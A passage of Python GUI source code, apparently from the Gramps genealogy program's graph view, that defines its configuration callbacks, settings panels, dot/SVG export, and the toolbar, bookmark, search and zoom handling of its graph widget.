def cb_update_show_full_dates(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the date setting.
"""
self.show_full_dates = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_show_places(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the place setting.
"""
self.show_places = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_place_fmt(self, _client, _cnxn_id, _entry, _data):
"""
Called when the configuration menu changes the place setting.
"""
self.graph_widget.populate(self.get_active())
def cb_update_show_tag_color(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the show tags setting.
"""
self.show_tag_color = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_show_lines(self, _client, _cnxn_id, _entry, _data):
"""
Called when the configuration menu changes the line setting.
"""
self.graph_widget.populate(self.get_active())
def cb_update_highlight_home_person(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the highlight home
person setting.
"""
self.highlight_home_person = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_home_path_color(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the path person color.
"""
self.home_path_color = entry
self.graph_widget.populate(self.get_active())
def cb_update_desc_generations(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the descendant generation
count setting.
"""
self.descendant_generations = entry
self.graph_widget.populate(self.get_active())
def cb_update_ancestor_generations(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the ancestor generation
count setting.
"""
self.ancestor_generations = entry
self.graph_widget.populate(self.get_active())
def cb_update_show_animation(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the show animation
setting.
"""
if entry == 'True':
self.graph_widget.animation.show_animation = True
# enable animate options
for widget in self.ani_widgets:
widget.set_sensitive(True)
else:
self.graph_widget.animation.show_animation = False
# diable animate options
for widget in self.ani_widgets:
widget.set_sensitive(False)
def cb_update_animation_count(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the animation count
setting.
"""
self.graph_widget.animation.max_count = int(entry) * 2
def cb_update_animation_speed(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the animation speed
setting.
"""
self.graph_widget.animation.speed = 50 * int(entry)
def cb_update_search_all_db(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the search setting.
"""
value = entry == 'True'
self.graph_widget.search_widget.set_options(search_all_db=value)
def cb_update_search_show_images(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the search setting.
"""
value = entry == 'True'
self.graph_widget.search_widget.set_options(show_images=value)
self.graph_widget.show_images_option = value
def cb_update_search_marked_first(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the search setting.
"""
value = entry == 'True'
self.graph_widget.search_widget.set_options(marked_first=value)
def cb_update_spacing(self, _client, _cnxd_id, _entry, _data):
"""
Called when the ranksep or nodesep setting changed.
"""
self.graph_widget.populate(self.get_active())
def cb_update_person_theme(self, _client, _cnxd_id, _entry, _data):
"""
Called when person theme setting changed.
"""
self.graph_widget.populate(self.get_active())
def cb_show_all_connected(self, _client, _cnxd_id, _entry, _data):
"""
Called when show all connected setting changed.
"""
value = _entry == 'True'
self.graph_widget.all_connected_btn.set_active(value)
self.graph_widget.populate(self.get_active())
def config_change_font(self, font_button):
"""
Called when font is change.
"""
font_family = font_button.get_font_family()
if font_family is not None:
font_name = font_family.get_name()
else:
font_name = ''
# apply Pango.SCALE=1024 to font size
font_size = int(font_button.get_font_size() / 1024)
self._config.set('interface.graphview-font', [font_name, font_size])
self.graph_widget.retest_font = True
self.graph_widget.populate(self.get_active())
def config_connect(self):
"""
Overwriten from :class:`~gui.views.pageview.PageView method
This method will be called after the ini file is initialized,
use it to monitor changes in the ini file.
"""
self._config.connect('interface.graphview-show-images',
self.cb_update_show_images)
self._config.connect('interface.graphview-show-avatars',
self.cb_update_show_avatars)
self._config.connect('interface.graphview-avatars-style',
self.cb_update_avatars_style)
self._config.connect('interface.graphview-show-full-dates',
self.cb_update_show_full_dates)
self._config.connect('interface.graphview-show-places',
self.cb_update_show_places)
self._config.connect('interface.graphview-place-format',
self.cb_update_place_fmt)
self._config.connect('interface.graphview-show-tags',
self.cb_update_show_tag_color)
self._config.connect('interface.graphview-show-lines',
self.cb_update_show_lines)
self._config.connect('interface.graphview-highlight-home-person',
self.cb_update_highlight_home_person)
self._config.connect('interface.graphview-home-path-color',
self.cb_update_home_path_color)
self._config.connect('interface.graphview-descendant-generations',
self.cb_update_desc_generations)
self._config.connect('interface.graphview-ancestor-generations',
self.cb_update_ancestor_generations)
self._config.connect('interface.graphview-show-animation',
self.cb_update_show_animation)
self._config.connect('interface.graphview-animation-speed',
self.cb_update_animation_speed)
self._config.connect('interface.graphview-animation-count',
self.cb_update_animation_count)
self._config.connect('interface.graphview-search-all-db',
self.cb_update_search_all_db)
self._config.connect('interface.graphview-search-show-images',
self.cb_update_search_show_images)
self._config.connect('interface.graphview-search-marked-first',
self.cb_update_search_marked_first)
self._config.connect('interface.graphview-ranksep',
self.cb_update_spacing)
self._config.connect('interface.graphview-nodesep',
self.cb_update_spacing)
self._config.connect('interface.graphview-person-theme',
self.cb_update_person_theme)
self._config.connect('interface.graphview-show-all-connected',
self.cb_show_all_connected)
def _get_configure_page_funcs(self):
"""
Return a list of functions that create gtk elements to use in the
notebook pages of the Configure dialog.
:return: list of functions
"""
return [self.layout_config_panel,
self.theme_config_panel,
self.animation_config_panel,
self.search_config_panel]
def layout_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
row = 0
configdialog.add_checkbox(
grid, _('Show images'), row, 'interface.graphview-show-images')
row += 1
configdialog.add_checkbox(
grid, _('Show avatars'), row, 'interface.graphview-show-avatars')
row += 1
configdialog.add_checkbox(
grid, _('Highlight the home person'),
row, 'interface.graphview-highlight-home-person')
row += 1
configdialog.add_checkbox(
grid, _('Show full dates'),
row, 'interface.graphview-show-full-dates')
row += 1
configdialog.add_checkbox(
grid, _('Show places'), row, 'interface.graphview-show-places')
row += 1
# Place format:
p_fmts = [(0, _("Default"))]
for (indx, fmt) in enumerate(place_displayer.get_formats()):
p_fmts.append((indx + 1, fmt.name))
active = self._config.get('interface.graphview-place-format')
if active >= len(p_fmts):
active = 1
configdialog.add_combo(grid, _('Place format'), row,
'interface.graphview-place-format',
p_fmts, setactive=active)
row += 1
configdialog.add_checkbox(
grid, _('Show tags'), row, 'interface.graphview-show-tags')
return _('Layout'), grid
def theme_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
p_themes = DotSvgGenerator(self.dbstate, self).get_person_themes()
themes_list = []
for t in p_themes:
themes_list.append((t[0], t[1]))
row = 0
configdialog.add_combo(grid, _('Person theme'), row,
'interface.graphview-person-theme',
themes_list)
row += 1
configdialog.add_color(grid,
_('Path color to home person'),
row, 'interface.graphview-home-path-color',
col=1)
row += 1
font_lbl = Gtk.Label(label=_('Font:'), xalign=0)
grid.attach(font_lbl, 1, row, 1, 1)
font = self._config.get('interface.graphview-font')
font_str = '%s, %d' % (font[0], font[1])
font_btn = Gtk.FontButton.new_with_font(font_str)
font_btn.set_show_style(False)
grid.attach(font_btn, 2, row, 1, 1)
font_btn.connect('font-set', self.config_change_font)
font_btn.set_filter_func(self.font_filter_func)
# Avatars options
# ===================================================================
row += 1
avatars = Avatars(self._config)
combo = configdialog.add_combo(grid, _('Avatars style'), row,
'interface.graphview-avatars-style',
avatars.get_styles_list())
combo.connect('show', self.cb_on_combo_show)
file_filter = Gtk.FileFilter()
file_filter.set_name(_('PNG files'))
file_filter.add_pattern("*.png")
self.avatar_widgets.clear()
row += 1
lbl = Gtk.Label(label=_('Male avatar:'), halign=Gtk.Align.END)
FCB_male = Gtk.FileChooserButton.new(_('Choose male avatar'),
Gtk.FileChooserAction.OPEN)
FCB_male.add_filter(file_filter)
FCB_male.set_filename(
self._config.get('interface.graphview-avatars-male'))
FCB_male.connect('file-set', self.cb_male_avatar_set)
grid.attach(lbl, 1, row, 1, 1)
grid.attach(FCB_male, 2, row, 1, 1)
self.avatar_widgets.append(lbl)
self.avatar_widgets.append(FCB_male)
row += 1
lbl = Gtk.Label(label=_('Female avatar:'), halign=Gtk.Align.END)
FCB_female = Gtk.FileChooserButton.new(_('Choose female avatar'),
Gtk.FileChooserAction.OPEN)
FCB_female.connect('file-set', self.cb_female_avatar_set)
FCB_female.add_filter(file_filter)
FCB_female.set_filename(
self._config.get('interface.graphview-avatars-female'))
grid.attach(lbl, 1, row, 1, 1)
grid.attach(FCB_female, 2, row, 1, 1)
self.avatar_widgets.append(lbl)
self.avatar_widgets.append(FCB_female)
# ===================================================================
return _('Themes'), grid
def animation_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
configdialog.add_checkbox(
grid, _('Show animation'),
0, 'interface.graphview-show-animation')
self.ani_widgets.clear()
widget = configdialog.add_spinner(
grid, _('Animation speed (1..5 and 5 is the slower)'),
1, 'interface.graphview-animation-speed', (1, 5))
self.ani_widgets.append(widget)
widget = configdialog.add_spinner(
grid, _('Animation count (0..8 use 0 to turn off)'),
2, 'interface.graphview-animation-count', (0, 8))
self.ani_widgets.append(widget)
# disable animate options if needed
if not self.graph_widget.animation.show_animation:
for widget in self.ani_widgets:
widget.set_sensitive(False)
return _('Animation'), grid
def search_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
row = 0
widget = configdialog.add_checkbox(
grid, _('Search in all database'), row,
'interface.graphview-search-all-db')
widget.set_tooltip_text(_("Also apply search by all database."))
row += 1
widget = configdialog.add_checkbox(
grid, _('Show person images'), row,
'interface.graphview-search-show-images')
widget.set_tooltip_text(
_("Show persons thumbnails in search result list."))
row += 1
widget = configdialog.add_checkbox(
grid, _('Show bookmarked first'), row,
'interface.graphview-search-marked-first')
widget.set_tooltip_text(
_("Show bookmarked persons first in search result list."))
return _('Search'), grid
def font_filter_func(self, _family, face):
"""
Filter function to display only regular fonts.
"""
desc = face.describe()
stretch = desc.get_stretch()
if stretch != Pango.Stretch.NORMAL:
return False # avoid Condensed or Expanded
sty = desc.get_style()
if sty != Pango.Style.NORMAL:
return False # avoid italic etc.
weight = desc.get_weight()
if weight != Pango.Weight.NORMAL:
return False # avoid Bold
return True
#-------------------------------------------------------------------------
#
# Printing functionalities
#
#-------------------------------------------------------------------------
def printview(self, *obj):
"""
Save the dot file for a later printing with an appropriate tool.
"""
# ask for the dot file name
filter1 = Gtk.FileFilter()
filter1.set_name("dot files")
filter1.add_pattern("*.gv")
dot = Gtk.FileChooserDialog(title=_("Select a dot file name"),
action=Gtk.FileChooserAction.SAVE,
transient_for=self.uistate.window)
dot.add_button(_('_Cancel'), Gtk.ResponseType.CANCEL)
dot.add_button(_('_Apply'), Gtk.ResponseType.OK)
mpath = config.get('paths.report-directory')
dot.set_current_folder(os.path.dirname(mpath))
dot.set_filter(filter1)
dot.set_current_name("Graphview.gv")
status = dot.run()
if status == Gtk.ResponseType.OK:
val = dot.get_filename()
(spath, _ext) = os.path.splitext(val)
val = spath + ".gv" # used to avoid filename without extension
# selected path is an existing file and we need a file
if os.path.isfile(val):
aaa = OptionDialog(_('File already exists'), # parent-OK
_('You can choose to either overwrite the '
'file, or change the selected filename.'),
_('_Overwrite'), None,
_('_Change filename'), None,
parent=dot)
if aaa.get_response() == Gtk.ResponseType.YES:
dot.destroy()
self.printview(obj)
return
svg = val.replace('.gv', '.svg')
# both dot_data and svg_data are bytes, already utf-8 encoded
# just write them as binary
try:
with open(val, 'wb') as __g, open(svg, 'wb') as __s:
__g.write(self.graph_widget.dot_data)
__s.write(self.graph_widget.svg_data)
except IOError as msg:
msg2 = _("Could not create %s") % (val + ', ' + svg)
ErrorDialog(msg2, str(msg), parent=dot)
dot.destroy()
#-------------------------------------------------------------------------
#
# GraphWidget
#
#-------------------------------------------------------------------------
class GraphWidget(object):
"""
Define the widget with controls and canvas that displays the graph.
"""
def __init__(self, view, dbstate, uistate):
"""
:type view: GraphView
"""
# variables for drag and scroll
self._last_x = 0
self._last_y = 0
self._in_move = False
self.view = view
self.dbstate = dbstate
self.uistate = uistate
self.parser = None
self.active_person_handle = None
self.actions = Actions(dbstate, uistate, self.view.bookmarks)
self.actions.connect('rebuild-graph', self.view.build_tree)
self.actions.connect('active-changed', self.populate)
self.actions.connect('focus-person-changed', self.set_person_to_focus)
self.dot_data = None
self.svg_data = None
scrolled_win = Gtk.ScrolledWindow()
scrolled_win.set_shadow_type(Gtk.ShadowType.IN)
self.hadjustment = scrolled_win.get_hadjustment()
self.vadjustment = scrolled_win.get_vadjustment()
self.canvas = GooCanvas.Canvas()
self.canvas.connect("scroll-event", self.scroll_mouse)
self.canvas.props.units = Gtk.Unit.POINTS
self.canvas.props.resolution_x = 72
self.canvas.props.resolution_y = 72
scrolled_win.add(self.canvas)
self.vbox = Gtk.Box(homogeneous=False, spacing=4,
orientation=Gtk.Orientation.VERTICAL)
self.vbox.set_border_width(4)
self.toolbar = Gtk.Box(homogeneous=False, spacing=4,
orientation=Gtk.Orientation.HORIZONTAL)
self.vbox.pack_start(self.toolbar, False, False, 0)
# add zoom-in button
self.zoom_in_btn = Gtk.Button.new_from_icon_name('zoom-in',
Gtk.IconSize.MENU)
self.zoom_in_btn.set_tooltip_text(_('Zoom in'))
self.toolbar.pack_start(self.zoom_in_btn, False, False, 1)
self.zoom_in_btn.connect("clicked", self.zoom_in)
# add zoom-out button
self.zoom_out_btn = Gtk.Button.new_from_icon_name('zoom-out',
Gtk.IconSize.MENU)
self.zoom_out_btn.set_tooltip_text(_('Zoom out'))
self.toolbar.pack_start(self.zoom_out_btn, False, False, 1)
self.zoom_out_btn.connect("clicked", self.zoom_out)
# add original zoom button
self.orig_zoom_btn = Gtk.Button.new_from_icon_name('zoom-original',
Gtk.IconSize.MENU)
self.orig_zoom_btn.set_tooltip_text(_('Zoom to original'))
self.toolbar.pack_start(self.orig_zoom_btn, False, False, 1)
self.orig_zoom_btn.connect("clicked", self.set_original_zoom)
# add best fit button
self.fit_btn = Gtk.Button.new_from_icon_name('zoom-fit-best',
Gtk.IconSize.MENU)
self.fit_btn.set_tooltip_text(_('Zoom to best fit'))
self.toolbar.pack_start(self.fit_btn, False, False, 1)
self.fit_btn.connect("clicked", self.fit_to_page)
# add 'go to active person' button
self.goto_active_btn = Gtk.Button.new_from_icon_name('go-jump',
Gtk.IconSize.MENU)
self.goto_active_btn.set_tooltip_text(_('Go to active person'))
self.toolbar.pack_start(self.goto_active_btn, False, False, 1)
self.goto_active_btn.connect("clicked", self.goto_active)
# add 'go to bookmark' button
self.goto_other_btn = Gtk.Button(label=_('Go to bookmark'))
self.goto_other_btn.set_tooltip_text(
_('Center view on selected bookmark'))
self.toolbar.pack_start(self.goto_other_btn, False, False, 1)
self.bkmark_popover = Popover(_('Bookmarks for current graph'),
_('Other Bookmarks'),
ext_panel=self.build_bkmark_ext_panel())
self.bkmark_popover.set_relative_to(self.goto_other_btn)
self.goto_other_btn.connect("clicked", self.show_bkmark_popup)
self.goto_other_btn.connect("key-press-event",
self.goto_other_btn_key_press_event)
self.bkmark_popover.connect('item-activated', self.activate_popover)
self.show_images_option = self.view._config.get(
'interface.graphview-search-show-images')
# add search widget
self.search_widget = SearchWidget(self.dbstate,
self.get_person_image,
bookmarks=self.view.bookmarks)
search_box = self.search_widget.get_widget()
self.toolbar.pack_start(search_box, True, True, 1)
self.search_widget.set_options(
search_all_db=self.view._config.get(
'interface.graphview-search-all-db'),
show_images=self.show_images_option)
self.search_widget.connect('item-activated', self.activate_popover)
# add accelerator to focus search entry
accel_group = Gtk.AccelGroup()
self.uistate.window.add_accel_group(accel_group)
search_box.add_accelerator('grab-focus', accel_group, Gdk.KEY_f,
Gdk.ModifierType.CONTROL_MASK,
Gtk.AccelFlags.VISIBLE)
# add spinners for quick generations change
gen_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
box = self.build_spinner('go-up-symbolic', 0, 50,
_('Ancestor generations'),
'interface.graphview-ancestor-generations')
gen_box.add(box)
box = self.build_spinner('go-down-symbolic', 0, 50,
_('Descendant generations'),
'interface.graphview-descendant-generations')
gen_box.add(box)
# pack generation spinners to popover
gen_btn = Gtk.Button(label=_('Generations'))
self.add_popover(gen_btn, gen_box)
self.toolbar.pack_start(gen_btn, False, False, 1)
# add spiner for generation (vertical) spacing
spacing_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
box = self.build_spinner('object-flip-vertical', 1, 50,
_('Vertical spacing between generations'),
'interface.graphview-ranksep')
spacing_box.add(box)
# add spiner for node (horizontal) spacing
box = self.build_spinner('object-flip-horizontal', 1, 50,
_('Horizontal spacing between generations'),
'interface.graphview-nodesep')
spacing_box.add(box)
# pack spacing spinners to popover
spacing_btn = Gtk.Button(label=_('Spacings'))
self.add_popover(spacing_btn, spacing_box)
self.toolbar.pack_start(spacing_btn, False, False, 1)
# add button to show all connected persons
self.all_connected_btn = Gtk.ToggleButton(label=_('All connected'))
self.all_connected_btn.set_tooltip_text(
_("Show all connected persons limited by generation restrictions.\n"
"Works slow, so don't set large generation values."))
self.all_connected_btn.set_active(
self.view._config.get('interface.graphview-show-all-connected'))
self.all_connected_btn.connect('clicked', self.toggle_all_connected)
self.toolbar.pack_start(self.all_connected_btn, False, False, 1)
self.vbox.pack_start(scrolled_win, True, True, 0)
# if we have graph lager than graphviz paper size
# this coef is needed
self.transform_scale = 1
self.scale = 1
self.animation = CanvasAnimation(self.view, self.canvas, scrolled_win)
self.search_widget.set_items_list(self.animation.items_list)
# person that will focus (once) after graph rebuilding
self.person_to_focus = None
# for detecting double click
self.click_events = []
# for timeout on changing settings by spinners
self.timeout_event = False
# Gtk style context for scrollwindow to operate with theme colors
self.sw_style_context = scrolled_win.get_style_context()
# used for popup menu, prevent destroy menu as local variable
self.menu = None
self.retest_font = True # flag indicates need to resize font
self.bold_size = self.norm_size = 0 # font sizes to send to dot
def add_popover(self, widget, container):
"""
Add popover for button.
"""
popover = Gtk.Popover()
popover.set_relative_to(widget)
popover.add(container)
widget.connect("clicked", self.spinners_popup, popover)
container.show_all()
def build_spinner(self, icon, start, end, tooltip, conf_const):
"""
Build spinner with icon and pack it into box.
Chenges apply to config with delay.
"""
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
img = Gtk.Image.new_from_icon_name(icon, Gtk.IconSize.MENU)
box.pack_start(img, False, False, 1)
spinner = Gtk.SpinButton.new_with_range(start, end, 1)
spinner.set_tooltip_text(tooltip)
spinner.set_value(self.view._config.get(conf_const))
spinner.connect("value-changed", self.apply_spinner_delayed,
conf_const)
box.pack_start(spinner, False, False, 1)
return box
def toggle_all_connected(self, widget):
"""
Change state for "Show all connected" setting.
"""
self.view._config.set('interface.graphview-show-all-connected',
widget.get_active())
def spinners_popup(self, _widget, popover):
"""
Popover for generations and spacing params.
Different popup depending on gtk version.
"""
if gtk_version >= 3.22:
popover.popup()
else:
popover.show()
def set_available(self, state):
"""
Set state for GraphView.
"""
if not state:
# if no database is opened
self.clear()
self.toolbar.set_sensitive(state)
def font_changed(self, active):
self.sym_font = config.get('utf8.selected-font')
if self.parser:
self.parser.font_changed()
self.populate(active)
def set_person_to_focus(self, handle):
"""
Set person that will focus (once) after graph rebuilding.
"""
self.person_to_focus = handle
def goto_other_btn_key_press_event(self, _widget, event):
"""
Handle 'Esc' key on bookmarks button to hide popup.
"""
key = event.keyval
if event.keyval == Gdk.KEY_Escape:
self.hide_bkmark_popover()
elif key == Gdk.KEY_Down:
self.bkmark_popover.grab_focus()
return True
def activate_popover(self, _widget, person_handle):
"""
Called when some item(person)
in search or bookmarks popup(popover) is activated.
"""
self.hide_bkmark_popover()
self.search_widget.hide_search_popover()
# move view to person with animation
self.move_to_person(None, person_handle, True)
def apply_spinner_delayed(self, widget, conf_const):
"""
Set params by spinners (generations, spacing).
Use timeout for better interface responsiveness.
"""
value = int(widget.get_value())
# try to remove planed event (changing setting)
if self.timeout_event and \
not self.timeout_event.is_destroyed():
GLib.source_remove(self.timeout_event.get_id())
# timeout saving setting for better interface responsiveness
event_id = GLib.timeout_add(300, self.view._config.set,
conf_const, value)
context = GLib.main_context_default()
self.timeout_event = context.find_source_by_id(event_id)
def build_bkmark_ext_panel(self):
"""
Build bookmark popover extand panel.
"""
btn_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
# add button to add active person to bookmarks
# tooltip will be changed in "self.load_bookmarks"
self.add_bkmark = Gtk.Button(label=_('Add active person'))
self.add_bkmark.connect("clicked", self.add_active_to_bkmarks)
btn_box.pack_start(self.add_bkmark, True, True, 2)
# add buton to call bookmarks manager
manage_bkmarks = Gtk.Button(label=_('Edit'))
manage_bkmarks.set_tooltip_text(_('Call the bookmark editor'))
manage_bkmarks.connect("clicked", self.edit_bookmarks)
btn_box.pack_start(manage_bkmarks, True, True, 2)
return btn_box
def load_bookmarks(self):
"""
Load bookmarks in Popover (goto_other_btn).
"""
# remove all old items from popup
self.bkmark_popover.clear_items()
active = self.view.get_active()
active_in_bkmarks = False
found = False
found_other = False
count = 0
count_other = 0
bookmarks = self.view.bookmarks.get_bookmarks().bookmarks
for bkmark in bookmarks:
if active == bkmark:
active_in_bkmarks = True
person = self.dbstate.db.get_person_from_handle(bkmark)
if person:
name = displayer.display_name(person.get_primary_name())
present = self.animation.get_item_by_title(bkmark)
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL,
spacing=10)
# add person ID
label = Gtk.Label("[%s]" % person.gramps_id, xalign=0)
hbox.pack_start(label, False, False, 2)
# add person name
label = Gtk.Label(name, xalign=0)
hbox.pack_start(label, True, True, 2)
# add person image if needed
if self.show_images_option:
person_image = self.get_person_image(person, 32, 32)
if person_image:
hbox.pack_start(person_image, False, True, 2)
row = ListBoxRow(person_handle=bkmark, label=name,
db=self.dbstate.db)
row.add(hbox)
if present is not None:
found = True
count += 1
self.bkmark_popover.main_panel.add_to_panel(row)
else:
found_other = True
count_other += 1
self.bkmark_popover.other_panel.add_to_panel(row)
row.show_all()
if not found and not found_other:
self.bkmark_popover.show_other_panel(False)
row = ListBoxRow()
row.add(Gtk.Label(_("You don't have any bookmarks yet...\n"
"Try to add some frequently used persons "
"to speedup navigation.")))
self.bkmark_popover.main_panel.add_to_panel(row)
row.show_all()
else:
if not found:
row = ListBoxRow()
row.add(Gtk.Label(_('No bookmarks for this graph...')))
self.bkmark_popover.main_panel.add_to_panel(row)
row.show_all()
if not found_other:
row = ListBoxRow()
row.add(Gtk.Label(_('No other bookmarks...')))
self.bkmark_popover.other_panel.add_to_panel(row)
row.show_all()
self.bkmark_popover.show_other_panel(True)
self.bkmark_popover.main_panel.set_progress(0, _('found: %s') % count)
self.bkmark_popover.other_panel.set_progress(
0, _('found: %s') % count_other)
# set tooltip for "add_bkmark" button
self.add_bkmark.hide()
if active and not active_in_bkmarks:
person = self.dbstate.db.get_person_from_handle(active)
if person:
name = displayer.display_name(person.get_primary_name())
val_to_display = "[%s] %s" % (person.gramps_id, name)
self.add_bkmark.set_tooltip_text(
_('Add active person to bookmarks\n'
'%s') % val_to_display)
self.add_bkmark.show()
def get_person_image(self, person, width=-1, height=-1, kind='image'):
"""
kind - 'image', 'path', 'both'
Returns default person image and path or None.
"""
# see if we have an image to use for this person
image_path = None
media_list = person.get_media_list()
if media_list:
media_handle = media_list[0].get_reference_handle()
media = self.dbstate.db.get_media_from_handle(media_handle)
media_mime_type = media.get_mime_type()
if media_mime_type[0:5] == "image":
rectangle = media_list[0].get_rectangle()
path = media_path_full(self.dbstate.db, media.get_path())
image_path = get_thumbnail_path(path, rectangle=rectangle)
# test if thumbnail actually exists in thumbs
# (import of data means media files might not be present
image_path = find_file(image_path)
if image_path:
if kind == 'path':
return image_path
# get and scale image
person_image = GdkPixbuf.Pixbuf.new_from_file_at_scale(
filename=image_path,
width=width, height=height,
preserve_aspect_ratio=True)
person_image = Gtk.Image.new_from_pixbuf(person_image)
if kind == 'image':
return person_image
elif kind == 'both':
return person_image, image_path
return None
def add_active_to_bkmarks(self, _widget):
"""
Add active person to bookmarks.
"""
self.view.add_bookmark(None)
self.load_bookmarks()
def edit_bookmarks(self, _widget):
"""
Call the bookmark editor.
"""
self.view.edit_bookmarks(None)
self.load_bookmarks()
def show_bkmark_popup(self, _widget):
"""
Show bookmark popup.
"""
self.load_bookmarks()
self.bkmark_popover.popup()
def hide_bkmark_popover(self, _widget=None, _event=None):
"""
Hide bookmark popup.
"""
self.bkmark_popover.popdown()
def goto_active(self, button=None):
"""
Go to active person.
"""
# check if animation is needed
animation = bool(button)
self.animation.move_to_person(self.active_person_handle, animation)
def move_to_person(self, _menuitem, handle, animate=False):
"""
Move to specified person (by handle).
If person not present in the current graphview tree,
show dialog to change active person.
"""
self.person_to_focus = None
if self.animation.get_item_by_title(handle):
self.animation.move_to_person(handle, animate)
else:
person = self.dbstate.db.get_person_from_handle(handle)
if not person:
return False
quest = (_('Person <b><i>%s</i></b> is not in the current view.\n'
'Do you want to set it active and rebuild view?')
% escape(displayer.display(person)))
dialog = QuestionDialog2(_("Change active person?"), quest,
_("Yes"), _("No"),
self.uistate.window)
if dialog.run():
self.view.change_active(handle)
def scroll_mouse(self, _canvas, event):
"""
Zoom by mouse wheel.
"""
if event.direction == Gdk.ScrollDirection.UP:
self.zoom_in()
elif event.direction == Gdk.ScrollDirection.DOWN:
self.zoom_out()
# stop the signal of scroll emission
# to prevent window scrolling
return True
def populate(self, active_person):
"""
Populate the graph with widgets derived from Graphviz.
"""
# set the busy cursor, so the user knows that we are working
self.uistate.set_busy_cursor(True)
if self.uistate.window.get_window().is_visible():
process_pending_events()
self.clear()
self.active_person_handle = active_person
# fit the text to boxes
self.bold_size, self.norm_size = self.fit_text()
self.search_widget.hide_search_popover()
self.hide_bkmark_popover()
# generate DOT and SVG data
dot = DotSvgGenerator(self.dbstate, self.view,
bold_size=self.bold_size,
norm_size=self.norm_size)
graph_data = dot.build_graph(active_person)
del dot
if not graph_data:
# something go wrong when build all-connected tree
# so turn off this feature
self.view._config.set('interface.graphview-show-all-connected',
False)
return
self.dot_data = graph_data[0]
self.svg_data = graph_data[1]
parser = GraphvizSvgParser(self, self.view)
parser.parse(self.svg_data)
self.animation.update_items(parser.items_list)
# save transform scale
self.transform_scale = parser.transform_scale
self.set_zoom(self.scale)
# focus on edited person if posible
if not self.animation.move_to_person(self.person_to_focus, False):
self.goto_active()
self.person_to_focus = None
# update the status bar
self.view.change_page()
self.uistate.set_busy_cursor(False)
def zoom_in(self, _button=None):
"""
Increase zoom scale.
"""
scale_coef = self.scale * 1.1
self.set_zoom(scale_coef)
def zoom_out(self, _button=None):
"""
Decrease zoom scale.
"""
scale_coef = self.scale * 0.9
if scale_coef < 0.01:
scale_coef = 0.01
self.set_zoom(scale_coef)
def set_original_zoom(self, _button):
"""
Set original zoom scale = 1.
"""
self.set_zoom(1)
def fit_to_page(self, _button):
"""
Calculate scale and fit tree to page.
"""
# get the canvas size
bounds = self.canvas.get_root_item().get_bounds()
height_canvas = bounds.y2 - bounds.y1
width_canvas = bounds.x2 - bounds.x1
# get scroll window size
width = self.hadjustment.get_page_size()
height = self.vadjustment.get_page_size()
# prevent division by zero
if height_canvas == 0:
height_canvas = 1
if width_canvas == 0:
width_canvas = 1
# calculate minimum scale
scale_h = (height / height_canvas)
scale_w = (width / width_canvas)
if scale_h > scale_w:
scale = scale_w
else:
scale = scale_h
scale = scale * self.transform_scale
# set scale if it needed, else restore it to default
if scale < 1:
self.set_zoom(scale)
else:
self.set_zoom(1)
def clear(self):
"""
Clear the graph by creating a new root item.
"""
# remove root item (with all children)
self.canvas.get_root_item().remove()
self.canvas.set_root_item(GooCanvas.CanvasGroup())
def get_widget(self):
"""
Return the graph display widget that includes the drawing canvas.
"""
return self.vbox
def button_press(self, item, _target, event):
"""
Enter in scroll mode when left or middle mouse button pressed
on background.
"""
self.search_widget.hide_search_popover()
self.hide_bkmark_popover()
if not (event.type == getattr(Gdk.EventType, "BUTTON_PRESS") and
item == self.canvas.get_root_item()):
return False
button = event.get_button()[1]
if button == 1 or button == 2:
window = self.canvas.get_parent().get_window()
window.set_cursor(Gdk.Cursor.new(Gdk.CursorType.FLEUR))
self._last_x = event.x_root
self._last_y = event.y_root
self._in_move = True
self.animation.stop_animation()
return False
if button == 3:
self.menu = PopupMenu(self, kind='background')
self.menu.show_menu(event)
return True
return False
def button_release(self, item, target, event):
"""
Exit from scroll mode when button release.
"""
button = event.get_button()[1]
if((button == 1 or button == 2) and
event.type == getattr(Gdk.EventType, "BUTTON_RELEASE")):
self.motion_notify_event(item, target, event)
self.canvas.get_parent().get_window().set_cursor(None)
self._in_move = False
return True
return False
def motion_notify_event(self, _item, _target, event):
"""
Function for motion notify events for drag and scroll mode.
"""
if self._in_move and (event.type == Gdk.EventType.MOTION_NOTIFY or
event.type == Gdk.EventType.BUTTON_RELEASE):
# scale coefficient for prevent flicking when drag
scale_coef = self.canvas.get_scale()
new_x = (self.hadjustment.get_value() -
(event.x_root - self._last_x) * scale_coef)
self.hadjustment.set_value(new_x)
new_y = (self.vadjustment.get_value() -
